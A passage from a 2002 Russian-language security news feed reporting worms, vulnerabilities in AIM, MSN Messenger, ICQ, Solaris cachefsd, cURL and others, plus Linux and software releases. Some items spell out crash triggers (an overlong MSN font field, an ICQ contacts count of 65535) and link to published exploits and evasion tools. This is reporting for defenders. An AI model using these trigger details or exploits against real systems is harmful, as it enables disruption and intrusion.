Техническая лаборатория компании "Panda Software" сообщает о распространении по электронной почте и IRC (Internet Relay Chat) нового червя VBS/Chick.D. Вирус состоит из компилированного HTML-файла размером 35,573 байт; пользователю предлагается открыть вложенный файл, якобы содержащий информацию о Билле Гейтсе. При запуске вложения червь создает два файла на зараженном компьютере (Mocosoft.chm и Script.ini), благодаря которым он может распространяться дальше. Файл Script.ini создается только при наличии установленного ПО для IRC чата. После этого VBS/Chick.D выводит на экран ряд сообщений, в частности, призыв включить элемент управления Active X. Если нажать "НЕТ", червь не запустится. Подробности - http://www.compulenta.ru/2002/5/7/29285/
7/05/2002 Создан список рассылки группы uinC.
Список рассылки uinC предназначен для обмена опытом в области разработки, исследования и применения информации, связанной с безопасностью компьютеров и компьютерных сетей. Для того чтобы подписаться нужно отправить письмо на адрес uinc-team-subscribe@yahoogroups.com.
7/05/2002 Уязвимость в AOL Instant Messenger (AIM).
Группа w00w00 обнаружила уязвимость в AIM. Уязвимость связана со старым эксплоитом w00w00 - w00aimexp. Для предотвращения старой уязвимости AOL не стала перерабатывать исходный код своего клиента, а просто поставила на свой сервер фильтр, отсекающий запросы типа AddExternalApp с TLV type=0x2711. w00w00 нашли (приводится имя John Hennessy) новый способ обхождения этого фильтра и использования уязвимости. Отличия от старого метода: 1. Применяется TLV type > 0x2711 вместо 0x2711. 2. Применяется функция AddExternalApp вместо AddGameRequest. 3. Смещение EIP для использования этой уязвимости сдвинуто на 200 байт вниз. w00w00 выражает удивление методами устранения уязвимостей в клиенте AIM со стороны AOL. Вместо "латания" самого клиента применяется метод фильтрации на сервере AOL. "Будем ждать пока кто-нибудь найдёт ещё один способ обхода AOL фильтра"-заключает группа. Подробное описание уязвимости - http://www.w00w00.org/advisories/aim2.html
7/05/2002 Бюллетень CERT об уязвимости в cachefsd в ОС Solaris.
После появления сообщения о нахождении уязвимости в демона кеширующей файловой системы (cachefsd) CERT опубликовал официальный информационный бюллетень с подробным разбором ситуации, примерами лог-файлов, указывающих на попытки использования этой уязвимости. Как пишет CERT уже поступили сигналы о попытках хакеров использовать эту уязвимость. CERT рекомендует использовать патч от производителя (Sun Inc.), при невозможности применения патча отключить cahefsd через /etc/inetd. Как указывается в бюллетене уязвимости не подвержены ОС фирм IBM (AIX) и SGI (IRIX). Она присутствует в версиях Solaris 2.5.1, 2.6, 7, 8 на Sparc и Intel-архитектуре. Бюллетень CERT - http://www.cert.org/advisories/CA-2002-11.html Информация от SUN - http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309
7/05/2002 Уязвимость в MSN Messenger от Microsoft.
Обнаружена уязвимость в MSN Messenger, которая позволяет удалённо вызвать падение MSN Messenger. Она связана с неправильной интерпретацией приложением поля X-MMS-IM-Format в заголовке пакета, задающего шрифт при посылке сообщения. Каждое сообщение, которое формируется клиентом MSN Messenger, предваряется заголовком, в котором указывается шрифт сообщения, цвет его и некоторая служебная информация. Обычно поле шрифта выглядит следующим образом - X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; Если вместо этого указать очень большой пакет (например FN=Times%20%20%20....), клиент MSN Messenger "упадёт". Источник - http://www.securityfocus.com
7/05/2002 Эксплоит для cURL.
Вчера в списке рассылки BUGTRAQ был опубликован эксплоит, использующий уязвимость ранее найденную в cURL. cURL-это утилита командной строки, использующаяся для получения и отправки файлов при помощи URL-синтаксиса. Поддерживает большинство Internet-протоколов, в том числе HTTP, HTTPS, FTP, FTPS, GOPHER, LDAP, DICT, TELNET, FILE. Написан Даниэлем Штенбергом (Daniel Stenberg) и входит в состав дистрибутивов Linux-Debian 2.2, RedHat Power Tools 6.1, 6.2, 7.0. Версия до 7.4 подвержена уязвимости, связанной с неправильным разбором границ запросов. В результате возникает возможность удалённого получения прав суперпользователя. Эксплоит на Перле выпущен Secure Network Operation Inc. Автор выпустил версию cURL 7.4.1, которая не подвержена этой уязвимости. Описание уязвимости - http://online.securityfocus.com/bid/1804 Эксплоит - http://www.snosoft.com/research/source/cURL-remote.perl.txt
7/05/2002 Компания CodeWeavers анонсировала пакет CrossOver Office.
Компания CodeWeavers объявила о завершении разработки любопытного пакета ПО позволяющего работать с Microsoft Office и Lotus Notes в ОС LINUX без использования эмулятора Windows и оплачивать соответствующую лицензию. Теперь достаточно установить на комп CrossOver Office и оба приложения прекрасно пойдут прямо из под Linux. При этом, как обещает компания, работать они будут быстрее. Подробности: http://www.codeweavers.com/home/
7/05/2002 Сегодняшний день ознаменовался релизом Beonex Communicator 0.8-pre.
Данный броузер (как Windows так и Linux-версии) основан на mozilla engine от 2002-04-30. По сообщениям разработчиков Beonex Communicator не подвержен атакам типа XMLHttpRequest. Сайт проекта - http://www.beonex.com/communicator
7/05/2002 Переполнение буфера в Windows NT 4.0 и Windows 2000 Server.
По данным eEye в Windows NT 4.0 и Windows 2000 Server обнаружена уязвимость, позволяющая злоумышленнику выполнить на удаленной машине произвольный код. Подробности - http://www.eeye.com/html/press/PR20020410.html
7/05/2002 DEF CON 10.
Со 2-ого по 4-ое августа Alexis Park Hotel в Лас-Вегасе будет принимать самый большой в истории съезд "андерграунда" со всего мира. Организаторы юбилейного 10-ого DEF CON планируют основательно подготовиться к приему гостей оснастив Alexis Park беспроводной сетью передачи данных, базирующейся на протоколе 802.11b, со шлюзом в интернет. DEF CON - http://www.defcon.org/
6/05/2002 RedHat 7.3.
Вышла новая версия дистрибутива RedHat Linux: 7.3. По традиции, эта версия не содержит в себе принципиальных изменений и является продолжением ветки 7.x. Дистрибутив основан на ядре Linux 2.4.18 с поддержкой VLAN, LVM, USB 2.0, LBA48/ATA133 и улучшенным системным планировщиком. В дистрибутив входит Gnome 1.4, Gtk+ 1.2 (плюс дополнительные 1.0 и 2.0.2), KDE 3.0.0, XFree86 4.2.0, Mozilla 0.9.9, Evolution 1.0.3 и др. В этой версии появилась возможность установки системы с ISO образов, лежащих на NFS разделе, возможность автоматической проверки контрольной суммы iso-образов и дисков. Источник - http://www.linux.org.ru/jump-message.jsp?msgid=187589
6/05/2002 FreeBSD-STABLE frozen.
Ветка FreeBSD-STABLE заморожена в предверии нового 4.6 релиза. Сам релиз ожидается 1-го июня, но скорее всего (как это обычно бывает) состоится несколько позже. Подробности - http://www.freebsd.org/news/newsflash.html#2002May1:0
6/05/2002 "Лаборатория Касперского" опубликовала горячую двадцатку вирусов за апрель.
Сегодня "Лаборатория Касперского" опубликовала горячую двадцатку апрельских вирусов. С огромным отрывом лидирует "червь" I-Worm.Klez, на его долю пришлось 94.5% от общего количества зарегистрированых инцидентов. На втором месте - I-Worm.BadtransII (1.5%). Третье место поделили Win32.Elkern.c и I-Worm.Sircam - по 0.6%. Полный отчёт за апрель - http://www.kaspersky.ru/news.html?id=679125
6/05/2002 Уязвимость в Cache File System в ОС Solaris.
Как указывает в списке рассылки BUGTRAQ исследовательская группа LSD (LAST STAGE OF DELIRIUM) из Польши, в Cache File System (управляется демоном cachefsd) в операционной системе Solaris версий 2.6 и выше обнаружена уязвимость, которая позволяет удалённо получить привилегии суперпользователя (root). Cache File System - кэширующий механизм файловой системы, который улучшает работу и масштабируемость NFS (Network File System). CFS поставляется по умолчанию с SUN Solaris. В Solaris cachefsd установлен как RPC-сервис с номером (идентификатором) 100235. Уязвимость связана с некорректным взаимодействием функций cachefsd_fs_mounted_1_svc() и cfsd_calloc(). В результате возникает уязвимость так называемого класса "переполнение кучи буффера" (heap buffer overflow). Источник - http://www.securityfocus.com
6/05/2002 Бесплатный семинар "Корпоративная безопасность информационных систем: защита от вирусов и несанкционированного доступа".
Компании SoftLine, Лаборатория Касперского и Aladdin проводят семинар "Корпоративная безопасность информационных систем: защита от вирусов и несанкционированного доступа". Семинар состоится 14 мая 2002 г. в 9.00 в Конференц-зале Математического института им. В.А. Стеклова. На семинаре Вы сможете узнать о новейших продуктах в области защиты корпоративной информации, а именно антивирусной защите и защите от несанкционированного доступа. Участники семинара получат методические материалы. Технический спонсор семинара: Компания "Формоза". Для того чтобы принять участие в семинаре, необходимо ОБЯЗАТЕЛЬНО зарегистрироваться на сайте. Место проведения: г. Москва, ул. Губкина, д. 8. Регистрационная форма: http://www.softline.ru/... Схема проезда: http://www.softline.ru/...
6/05/2002 Статья по реверс-инженирингу.
Довольно любопытная статья по реверс-инженирингу под названием "Reverse Engineering Malware". Автор-Lenny Zeltser. Довольно подробно на примере исследования трояна IRC.SRVCP (один из клонов редкого трояна Tasmer) рассказывается о методах и инструментах, применяемых при реверс-инжениринге. Для исследования трояна автор применил продукт компании WMware c установленными 3-мя ОС: Win98, Win2K, Linux. На них были "навешаны" программы-Filemon, Regmon, TCPView Pro, Winalysis, Undelete, Snort. Эти продукты помогали исследовать изменения, вносимые трояном в систему, а также сетевую активность трояна, который при заражении системы соединяется к IRC-серверу. Для исследования исходного кода трояна использовались SoftICE и дизассемблер IDA Pro. Cтатья доступна здесь - http://www.zeltser.com/sans/gcih-practical/revmalw.html
5/05/2002 Клайв Синклер собирается вернуться и преподать Intel урок.
Клайв Синклер, создатель знаменитого компьютера ZX-Spectrum, спустя почти 20 лет хочет вновь вернуться на рынок домашних компьютеров и выбить с него PC'шки с помощью более дешевых аналогов на базе процессора ARM и, конечно же, ОС Linux. Источник - http://www.linux.org.ru/
5/05/2002 Юному мошеннику Коулу Бартиромо предъявлены новые обвинения.
Комиссия по биржам и ценным бумагам США предъявила новые обвинения 17-летнему Коулу Бартиромо, который ранее в этом году был обвинен в крупном интернет-мошенничестве. Суть новых обвинений сводится к тому, что от действий Бартиромо пострадало 15 компаний, акции которых участвуют в биржевых торгах. Напомним, что подросток сумел заработать около 1 млн. долл., "накачивая" стоимость некоторых акций путем размещения в интернете многочисленных объявлении о продаже ценных бумаг с гарантированной доходностью от 125 до 2500%. В результате Бартиморо продавал предварительно закупленные им акции по высокой цене, а деньги переводил на свой счет в одном из казино в Коста Рике. Подробности - http://www.compulenta.ru/2002/5/1/29166/
5/05/2002 Morpheus ворует деньги.
Интернет-издание Newsbytes сообщило об особенности новой версии файлобменного клиента Morpheus, которая может нанести ущерб интересам участников различных партнерских программ в области интернет-торговли. Такие программы обычно подразумевают, что владелец сайта, с которого покупатель пришел в онлайновый магазин, получает некоторый процент от суммы покупки. Однако входящий в состав новой версии Morpheus дополнительный модуль Morpheus Shopping Club от фирмы Wurld Media перехватывает адрес ссылки, по которой кликает пользователь, и меняет идетификатор сайта, с которого тот в действительности пришел, на свой собственный. В результате все отчисления достаются Wurld Media, а не сайту-партнеру торговой сети. Источник - http://www.compulenta.ru/2002/5/1/29165/
4/05/2002 Samba 2.2.4.
Вышла новая версия Samba. Скачать - ftp://us1.samba.org/pub/samba/samba-2.2.4.tar.gz
4/05/2002 Автор вируса 'Melissa' получил 20 месяцев тюрьмы.
Сегодня в суде Нью Джерси был вынесен приговор 33-х летнему David L. Smith'у за написание и распространение почтового "червя" Melissa в марте 1999г. По оценкам экспертов вирус нанес более 80 млн. долларов ущерба. Напомним, что при получении зараженного письма, вирус рассылал себя по 50-ти адресам, полученным из адресной книги пользователя. Первичную рассылку вируса Smith осуществил через сеть America Online, используя украденные логин и пароль. Уже 1-го апреля 1999г. его арестовали, так как AOL провели расследование и определили телефонный номер, с которого проводилась рассылка. Первично Smith приговаривался к 5-ти годам тюрьмы, однако учитывая его помощь в расследованиях и поиске других вирусописателей, суд смягчил свой приговор. Еще одним аргументом в пользу Smith'а было то, что вирус не уничтожал никаких данных, а просто занимался саморазмножением. Smith признал свою вину, и сказал, что написание вируса было его самой большой ошибкой. Также он считает, что стал первым вирусописателем, который сядет в тюрьму. По данным http://www.cnn.com/2002/TECH/internet/05/01/melissa.virus.ap/index.html
4/05/2002 Переполнение буфера в Macromedia Flash Activex.
Данная уязвимость дает возможность выполнения произвольного кода на машине пользователя, в момент просмотра Flash ролика. Уязвимы: Flash Activex Ocx Version 6, revision 23 и возможно предыдущие версии Flash.ocx - это activex объект, устанавливающийся с IE, и использующийся для просмотра flash роликов размещенных на html страницах. Особой опасности подвержены пользвователи IE, так как броузер считает ocx объекты подписанные Macromedia - безопасными и автоматически их отображает. Передаваемый параметр объекта дает возможность выполнить произвольный код, перезаписывая EBP и EIP. Источник - http://www.eEye.com
4/05/2002 2.5.x-preN больше не будет.
Линус отказался от -pre пачей "не стабильной" ветки ядра. Эта идея давно обсуждалась на lkml. Теперь 2.5.N версии будут появляться чуть ли не каждый день. Источник - http://www.linux.org.ru/
4/05/2002 Уязвимость в Netscape и Mozilla.
Израильская компания GreyMagic Software сообщила об обнаружении уязвимости в браузерах Mozilla и Netscape 6.1. Используя дыру, содержащуюся в модуле XMLHTTP этих браузеров, злоумышленник может получить доступ к файлам, хранящимся на дисках атакуемого компьютера. В GreyMagic отмечают, что найденная уязвимость аналогична дыре в модуле XMLHTTP браузера Internet Explorer 6, которая была обнаружена в декабре. XMLHTTP является одним из важнейших компонентов современных браузеров, отвечающим за обработку страниц на языке XML. Источник - http://zdnet.com.com/2100-1104-896099.html
4/05/2002 Тестирование O(1) scheduler.
Результаты тестирования нового Linux планировщика. Ознакомиться - http://home.earthlink.net/~rwhron/kernel/bigbox.html
4/05/2002 Linux 2.5.12.
Сегодня вышла новая версия ядра ветви 2.5. Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/patch-2.5.12.gz
1/05/2002 OpenOffice 1.0.
Команда разработчиков офисного пакета OpenOffice объявила о выпуске первого стабильного релиза - OpenOffice 1.0. OpenOffice-это аналог Microsoft Office для *nix-подобных ОС. Подробности - http://www.openoffice.org
1/05/2002 Возможность удалённого получения прав суперпользователя в ОС Sun Solaris.
В RPC-сервисе rwall в операционной системе фирмы SUN Solaris 6, 7, 8 (x86 и SPARC-платформы) обнаружена уязвимость, которая позволяет получить как удалённо, так и локально права суперпользователя (root). Уязвимость связана с неправильным разбором функции syslog(), который позволяет выполнить злоумышленнику код от имени root. Ошибку обнаружила группа GOBBLES. Эксплоит с названием xwall.c выпущен. Администраторам до выхода официального патча рекомендуется отключить эту службу в /etc/inetd. Источник - http://www.securityfocus.com
1/05/2002 Уязвимость в FTP-сервере 3Cdaemon.
В FTP-сервере для ОС Windows 3Cdaemon 2.0 revision 10 обнаружена уязвимость. Она состоит в том, что при посылке больше 400 символов в поле логина сервер "падает". Опубликован код удалённого эксплоита. Эксплоит - http://msh.kut.nu/articles/msh3comdos.c
1/05/2002 Возможность DoS в RealSecure Network Sensor.
Как пишет в BUGTRAQ ISS X-Force в cетевом мониторе RealSecure Network Sensor, который выпускает эта компания, существует уязвимость, позволяющая злоумышленнику, сформировавшему специальный сетевой пакет, вывести из строя этот сетевой монитор (атака, типа DoS). Уязвимость связана с информационными сигнатурами протокола DHCP. Уязвимости подвержены версии продукта: RealSecure Network Sensor 5.x, XPU 3.4; RealSecure Network Sensor 6.0, XPU 3.4; RealSecure Network Sensor 6.5. Пользователям и администраторам рекомендуют обновить свои продукты до версии RealSecure X-Press Update 4.3, а до обновления блокировать доступ к сети на внешнем периметре брандмауэрами, блокировав доступ по протоколу DHCP извне - порт 67/UDP. Обновление доступно здесь - http://www.iss.net/download/
1/05/2002 Возможность доступа к локальным файлам в Netscape 6 и Mozilla.
Как указывается в письме в BUGTRAQ от GreyMagic Software (Израиль), при посещении определённых сайтов имеется возможность получить доступ к локальным файлам пользователей, который используют броузеры Netscape и Mozilla. Тестировались броузеры Mozilla (0.9.7+) и Netscape (6.1+) для ОС Windows NT4 и 2000. Уязвимость связана с объектом XMLHttpRequest компонента XMLHTTP. Этот компонент предназначен для доступа к XML-документам Вэб-сервера. Пока авторы уязвимости не получили ответа от Netscape (отчёт был отправлен 24 апреля). Необходимо отметить, что подобная уязвимость была обнаружена в IE6 в декабре 2001 г. и была убрана Microsoft патчем MS02-008. Подробное описание - http://security.greymagic.com/adv/gm001-ns/
1/05/2002 Хакеры на страже безопасности США.
Newsbyte сообщила о группе хакеров, проводящих взломы сайты в целях улучшения национальной безопасности. Во вторник жертвами атак стали серверы таких организаций как Sandia National Laboratories, U.S. Geological Survey (USGS) и Национальный институт по стандартам и технологиям (NIST). Источник: http://www.newsbytes.com/news/02/176256.html
1/05/2002 Сайт Ватикана номинирован на интернет-премию.
Британский сайт Vnunet.com сообщает, что официальный сайт Ватикана номинирован на интернет-пермию Webby в категории "религия". Выдвижение онлайнового представительства Католической церкви на премию Академии цифровых искусств и наук стало возможным благодаря ее успехам в освоении виртуального пространства - сайт Ватикана имеет хороший дизайн и содержит большое количество важной для католиков информации. Подробности: http://www.compulenta.ru/2002/5/1/29172/ Ватикан: http://www.vatican.va/
30/04/2002 Уязвимость в сканере уязвимостей в Windows.
В программе Microsoft Baseline Security Analyzer была обнаружена дыра, которой могут воспользоваться злоумышленники. Данная утилита была выпущена компанией Microsoft для сканирования системы Windows 2000/XP на предмет наличия уязвимостей. Однако уязвимость, как выясняется, есть даже в ней. Как сообщается на сайте SecuriTeam, MBSA создает отчет в обычном текстовом формате, который помещается в папку C:\Documents and Settings\username\SecurityScans, причем пользователь не может изменить расположение отчета на диске. Если злоумышленникам удастся получить содержимое данного файла (специалисты по безопасности утверждают, что в этом нет ничего невозможного), в их распоряжении окажется готовый план для атаки - информация обо всех уязвимых местах системы. Источник: http://www.compulenta.ru/2002/4/29/29090/
30/04/2002 ALT Linux Master 2.0.
Вышла вторая версия популярного Linux-дистрибутива. Скачать - ftp://ftp.altlinux.ru/pub/distributions/ALTLinux/Master/2.0/
30/04/2002 Jordan K. Hubbard ушёл из core team.
Вчера Jordan K. Hubbard, один из основателей и самый уважаемый человек в FreeBSD core team, на данный момент работающий на компанию Apple, написал следующее письмо с просьбой исключить его из core team. Письмо - http://www.linux.kiev.ua/article.php?sid=207&mode=thread&order=0 Источнк - http://www.linux.kiev.ua/
30/04/2002 Обнаружена очередная уязвимость в пакете sudo для Linux.
Компания Red Hat сообщает об обнаружении уязвимости в утилите sudo для Linux. Данная утилита дает возможность обычным пользователям выполнять отдельные команды с правами root. Как сообщила компания Global InterSec, в версиях утилиты 1.6.5p2 существует уязвимость, благодаря которой пользователь может получить права администратора на локальной машине. Источник - http://www.compulenta.ru/2002/4/26/28945/
29/04/2002 The 2nd Annual Debian Conference (Debconf2). Конференция будет проходить с 5го по 7ое Июля. Цель конференции - собрать вместе многих разработчиков Debian в целях улучшения этой системы. Подробности и регистрационная форма для участия здесь: http://lindows.com/debconf2
28/04/2002 Два интересных документа:.
+ Remote Timing Techniques. Эта статья описывает технологию удаленной синхронизации по встроенной операции и опциям TCP/IP. Эта технология используется для точного наблюдения за потоком TCP/IP данных с целью определения различий в синхронизации функционирования (режима работы) удаленного приложения и отнесения их к выбранным данным и/или явлениям. Ознакомиться: http://maurol.com.ar/security/RTT.pdf
+ Distributed Reflection Denial of Service. Описание, анализ и обсуждение способов предотвращения DDoS. Читать статью: http://grc.com/dos/drdos.htm
27/04/2002 Дайджест KDE за 25 апреля.
Вышел очередной дайджест новостей, касающихся KDE. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2002-04-26-005-26-NW-KE-RL
27/04/2002 GNOME 2.0 Desktop Beta 4.
Вышла четвертая beta версия GNOME 2.0. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2002-04-25-016-26-NW-GN
27/04/2002 Защищенная версия почтовой программы The Bat! Pro.
В четверг компании RitLabs, "Лаборатория Касперского", "Крипто Про" и Aladdin Software Security представили совместную разработку - защищенную версию популярной почтовой программы The Bat! Pro. Данная версия имеет не только функции проверки данных на вирусы, но также, в нее встроена хорошая система шифрования, которая защищает возможность перехвата паролей, почтовые базы и соединения. Источник: http://www.compulenta.ru/2002/4/27/29015/
27/04/2002 Новая уникальная технология обхода межсетевых экранов(фаерволлов).
Итальянцу Paolo Iorio удалось придумать уникальный способ создания соединения, которое не будет замечено локальным фаерволлом. Идея очень проста - программа, которая создает соединение внедряется при запуске в пространство памяти отведенное для программы самого фаерволла и таким образом фаерволл не замечает, что был создан новый процесс. Для демонстрации данной технологии Paolo Iorio создал демонстрационную утилиту, которая умеет обходить Kerio Personal Firewall, McAfee Personal Firewall, Norton Internet Security 2002, Sygate Personal Firewall Pro, Tiny Personal Firewall. Скачать демо утилиту и прочитать подробности можно здесь: http://piorio.supereva.it/backstealth.htm
27/04/2002 Обнаружена уязвимость в известном MP3-плеере WinAMP.
Уязвимость найдена в обработке ID3v2-тэгов, которые не проверяются на длину. При специально сгенерированном таким образом теге можно не только "повесить" WinAmp, но и выполнить свой собственный код. Подробности: http://www.compulenta.ru/2002/4/27/29031/
26/04/2002 Иллюстрированное Руководство по Установке FreeBSD.
Это пособие будет идеальным решением для новичков, которые никогда не сталкивались с установкой Unix подобных систем. Каждая ступень установки подробно описывается и приводится скриншот экрана. Ознакомиться: http://unix1.jinr.ru/~lavr/FreeBSDR/
26/04/2002 Новая серверная Windows увидит свет к 2003 году.
Корпорация Microsoft собирается сосредоточить свои усилия на разработке совершенно новой версии операционной системы семейства Windows .Net Server, которая фигурирует под кодовым названием Longhorn ("Длинный рог"). Особый интерес к новой ОС среди экспертов вызван, прежде всего, запланированным в ней переходом к новой файловой системе. Не так давно была проведена конференция разработчиков аппаратных платформ под Windows (Windows Hardware Engineers Conference), на которой были более подробно освещены вопросы, связанные с Longhorn - новой серверной версией ОС семейства Windows .Net Server, официальный выпуск которой откладывался уже дважды и которая, скорее всего, выйдет в конце текущего года и дойдет до конечных пользователей в начале 2003 года. Источник: http://www.cnews.ru/topnews/2002/04/23/content2.shtml
25/04/2002 DoS в Internet Explorer и возможное переполнение буффера.
Как указывает в списке рассылки BUGTRAQ Berend-Jan Wever существует возможность выполнения атаки типа DoS на популярный броузер Internet Explorer. Уязвимости подвержены все версии IE-вплоть до версии 6.0 со всеми патчами. Правда, уязвимы только броузеры для платформы Win9x. В W2K IE не повержен этой уязвимости. Уязвимость связана с возможностью формирования неверное IMG SRC со ссылкой на событие onError, при это формируется бесконечный цикл и IE "умирает". Подробное описание уязвимости с различными примерами приведены ниже на странице автора. Источник и описание - http://spoor12.edup.tudelft.nl
25/04/2002 Возможность DoS в Icq2001b, Icq2002a.
22 апреля в BUGTRAQ Michael (spacoom@gmx.net) опубликовал возможность проведения атаки типа DoS против популярных ICQ-клиентов 2001b и 2002a. Если злоумышленник пошлёт специально сформированное "contact" - cообщение, он может "заморозить" ICQ жертвы. Данное сообщение должно содержать в поле "contacts number" содержимого пакета contacts-msg "65535" (в 16-ричном виде). При этом ICQ перестаёт отвечать на запросы. Task manager показывает, что ICQ начинает потреблять всё больше системных ресурсов, пока не будет убит либо, не израсходует все системные ресурсы. Автор рекомендует в качестве временного решения проблемы запретить принимать contacts от кого бы то ни было (включая лиц из Вашего контактного списка). Патч от AOL не выпущен, вместо него автор выпустил эксплоит. Переписка автора с AOL - http://www.spacoom.net/dfm/aol.txt Эсплоит - http://www.spacoom.net/dfm/DFM.exe
25/04/2002 Уязвимость типа Cross-Site scripting присутствует на многих Вэб-серверах.
Как указывает в своём письме в BUGTRAQ philer из InterWN Labs (Нидерланды), многие WWW-сервера по-прежнему подвержены уязвимости типа Cross-Site scripting (CSS). Среди серверов называется сервера таких крупных компаний, как Midway, Corel, NYTimes.com, AOL, Real Networks, Cisco, IBM, www.whitehouse.gov и www.nipc.gov. Примечательно, что за 2 дня до этого в этом же списке рассылки Berein-Jan Wever также указал на подобную уязвимость на многих WWW-cерверах. Назывались имена - www.search.com, www.altavista.com, edit.yahoo.com, search.netscape.com и другие. Полный список уязвимых серверов - http://www.interwn.nl/release/cssvulns.txt Список Berein-Jan Wever (обновляется ежедневно) - http://spoor12.edup.tudelft.nl/skylined
25/04/2002 Релиз RATS 1.4.
В BUGTRAQ анонсирован очередной релиз пакета RATS (Rough Auditing Tool for Security). Этот пакет предназначен для программистов, которые пишут приложения для различных серверных задач. Работает с кодами на языках C, C++, Python, Perl и PHP. RATS сканирует исходный текст написанной программы и указывает в нём потенциально опасные, с точки зрения безопасности, участки кода. Выпускается на условиях GPL2. Источник - http://www.securesw.com/rats/
25/04/2002 Интернет-расист получил два года условно.
Норвежец, распространявший в сети расистскую информацию, осужден за контент своего сайта Как сообщила Ananova, данный факт осуждения гражданина Норвегии может создать юридический прецедент для борьбы с проявлениями расизма в интернете. Подробности: http://webplanet.ru/article/813.html
25/04/2002 Остров Мауи будет опутан беспроводным интернетом.
По информации Pacific Business News, летом этого года весь остров Мауи будет опутан беспроводным интернетом. При помощи беспроводного модема размером с ладонь жители острова смогут получить доступ к одной из первых сетей третьего поколения и воспользоваться услугами широкополосного интернета. Подробности: http://www.compulenta.ru/2002/4/25/28860/
25/04/2002 Kernel 2.5.10.
Сегодня вышло очередное Development ядро версии 2.5.10. Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/
24/04/2002 В сети появился новый вирус.
Вирус приходит на email жертвы с темой письма «Jenna Jameson pornostar free superfuck+photo addresses». В письме находится аттачмент, - файл JENNA-JAMESON-FREE-SUPERFUCK.TXT.vbs, в котором под видом теста на самом деле скрывается вирус, написанный на Visual Basic. Согласно данным фирмы по производству антивирусов BitDefender, порновирус дублирует другого известного червя Kagra. Михаэла Стоян (Mihaela Stoian), вирусный исследователь в BitDefender, сообщает: «Kagra - другой пример злонамеренного кода, использовавшего имена знаменитостей для заражения пользовательских компьютеров». По ее мнению, с увеличением количества порноспама (безобидных, но назойливых писем), различить среди них вирус не так то просто. Подробности: http://webplanet.ru/article/807.html
24/04/2002 Сайт iXBT.com объявляет о создании журнала iXBT.com.
По своей сути новый журнал будет представлять собой компактную форму содержания сайта iXBT.com за 30-дневный период. В связи с тем, что в печатном виде нельзя добиться такой же оперативности представления информации, как на сайте, основной упор в журнальной версии iXBT.com будет сделан на предоставление читателям информации, которая не теряет актуальности продолжительное время. При отборе материалов для журнала iXBT.com предпочтение будет отдаваться аналитическим обзорам существующих компьютерных продуктов и технологий с обязательными результатами фактического тестирования и рассмотрением конкретных товаров. Подробности: http://www.ixbt.com/pr/pr08.shtml
24/04/2002 C&W и Cisco объединяют усилия в области IP LAN и WAN.
По информации Total Telecom, компании Cisco Systems и Cable & Wireless планируют объединить усилия для ускорения внедрения глобальных коммуникационных IP-сетей. Подробности: http://www.compulenta.ru/2002/4/24/28827/
24/04/2002 Выпущена версия Mandrake Linux 8.2 для Power PC.
Компания MandrakeSoft представила новую версию дистрибутива на базе открытой операционной системы Mandrake Linux 8.2 для работы на платформе Power PC. Очередная версия дистрибутива оптимизирована для работы в системе с процессором G3. В дистрибутив добавлены новые средства настройки системы, включены обновленные версии различного программного обеспечения. Подробности: http://www.compulenta.ru/2002/4/24/28824/
24/04/2002 Билл Гейтс: Открытые исходники разрушительны для экономики.
На прошлой неделе основатель компании Microsoft Билл Гейтс выступил с речью на конференции в Сиэтле, в ходе которой он говорил о сильных и слабых сторонах использования открытого программного обеспечения в правительственных структурах. Билл Гейтс заявил, что необходимость в разработке ПО для государства означает создание дополнительных рабочих мест для программистов. Но так, по мнению Гейтса, произойдет только в случае разработки и внедрения коммерческого ПО. Подробности - http://www.compulenta.ru/2002/4/23/28738/
23/04/2002 Очередная уязвимость в FreeBSD. Локальный юзер может без проблемм получить права root'а.
Подробности: http://www.pine.nl/advisories/pine-cert-20020401.html
23/04/2002 PHP 4.2.0.
Сегодняшний день проходит под знаком PHP. В новой версии включена поддержка 2-й версии апача, улучшена работа с PostgreSQL, исправлена поддержка iconv под FreeBSD и многое другое. Changelog - http://www.php.net/ChangeLog-4.php Скачать - http://www.php.net/do_download.php?download_file=php-4.2.0.tar.gz
22/04/2002 Программа для клонирования и бекапа систем - Универсальный Backup v1.1.
Русская бесплатная разработка, которая вполне может посоперничать с такими гигантами, как Norton Ghost и Powerquest Drive Image, имея при этом совсем небольшой размер (190 кб). Однако, можно сказать, что эта программа имеет кое-какие приемущества по сравнению с упомянутыми зарубежными разработками - программа умеет архивировать не только целые диски и разделы, но и непосредственно отдельные файлы и нити реестра. В стандартной поставке программы включены две версии: для DOS и Win32 систем. Домашняя страничка программы Универсальный Backup: http://www.mwt.ru
21/04/2002 Ernst & Young помогут вам стать хакером.
Известная консалтинговая компания Ernst & Young объявила о продолжении своих знаменитых курсов eXtreme Hacking и опубликовала расписание занятий. На этих курсах IT-профессионалы получают возможность самостоятельно изучить и воспользоваться технологиями, которыми пользуются настоящие взломщики корпоративных сетей. Эти курсы считаются одними из лучших в своем классе. Их ведут сотрудники подразделения Security & Technology компании, некоторые из которых ранее служили офицерами в Центре Информационной Войны ВВС США. Источник: http://www.linuxcenter.ru/news/#979
21/04/2002 Новый инструмент камуфлирует хакерские программы.
Инструмент, называемый Fragroute, использует несколько методов обмана систем распознавания атак на основе сигнатур, применяемых многими системами обнаружения проникновений и межсетевыми экранами. Большинство этих методов было описано в научной работе, опубликованной четыре года назад. Новый инструмент опрокидывает баланс сил в "гонке вооружений" между взломщиками сетей и их защитниками – по крайней мере на время. Любой брандмауэр или система обнаружения проникновений, в которой Fragroute найдет слабину, становится уязвимой для атак вандалов. Fragroute – программа двоякого действия: она выявляет слабые места сетевой защиты, выдавая информацию, которая системному администратору помогает защитить свою сеть, а хакеру – атаковать ее. Используя несколько методов введения специфических данных в содержание пакетов, Fragroute обманывает системы обнаружения. Подробности: http://www.zdnet.ru/?ID=186120 Скачать Fragroute можно здесь: http://www.monkey.org/~dugsong/fragroute/
21/04/2002 Бывший исполнительный директор Сisco находится в бегах.
Бывший руководитель, Роберт Гордон, предстал перед судом в Мае прошлого года за мошенничество с использованием электронных средств коммуникации, а также за перевод со счетов компании на свои личные счета на Багамских островах 11 миллионов долларов в ценных бумагах. Министерство юстиции США выдало ордер на арест Гордона после того как он не явился на очередное заседание суда во Вторник. Подробности: http://www.compulenta.ru/2002/4/21/28661/
21/04/2002 Японцы сконструировали самый быстрый компьютер в мире.
